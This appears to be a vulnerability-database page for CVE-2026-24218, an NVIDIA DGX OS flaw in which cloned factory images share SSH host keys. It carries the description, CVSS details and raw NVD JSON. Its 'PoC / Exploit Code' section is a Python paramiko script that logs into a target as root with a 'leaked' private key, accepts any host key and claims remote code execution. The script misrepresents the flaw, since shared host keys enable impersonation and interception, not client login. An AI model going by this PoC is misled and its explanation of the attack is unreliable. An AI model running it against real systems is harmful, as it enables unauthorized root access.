Security Vulnerability Report
中文
CVE-2026-24218 CVSS 8.1 HIGH

CVE-2026-24218

Published: 2026-05-20 20:16:37
Last Modified: 2026-05-21 15:26:36
Source: [email protected]

Description

NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or attacker-in-the-middle attacks. A successful exploit of this vulnerability might lead to code execution, data tampering, escalation of privileges, information disclosure, and denial of service.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NVIDIA DGX OS (工厂配置镜像克隆版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept: Check for duplicate SSH host keys or connect using a leaked key. import paramiko import socket # Assume we extracted the private key from a compromised image PRIVATE_KEY_PATH = "id_rsa_leaked" TARGET_HOST = "target-dgx-system-ip" try: # Initialize SSH client ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Accepts the host key automatically # Attempt to connect using the leaked private key (assuming user access is obtained or key auth is forced) # Note: In a real scenario, this demonstrates the risk of shared keys allowing impersonation. private_key = paramiko.RSAKey.from_private_key_file(PRIVATE_KEY_PATH) print(f"[*] Attempting to connect to {TARGET_HOST} using leaked key...") ssh.connect(TARGET_HOST, username='root', pkey=private_key) # Execute command to show control stdin, stdout, stderr = ssh.exec_command('uname -a') print(stdout.read().decode()) print("[+] Exploit successful: Remote code execution achieved via shared key.") ssh.close() except Exception as e: print(f"[-] Connection failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24218", "sourceIdentifier": "[email protected]", "published": "2026-05-20T20:16:36.620", "lastModified": "2026-05-21T15:26:35.653", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or attacker-in-the-middle attacks. A successful exploit of this vulnerability might lead to code execution, data tampering, escalation of privileges, information disclosure, and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24218", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5835", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24218", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.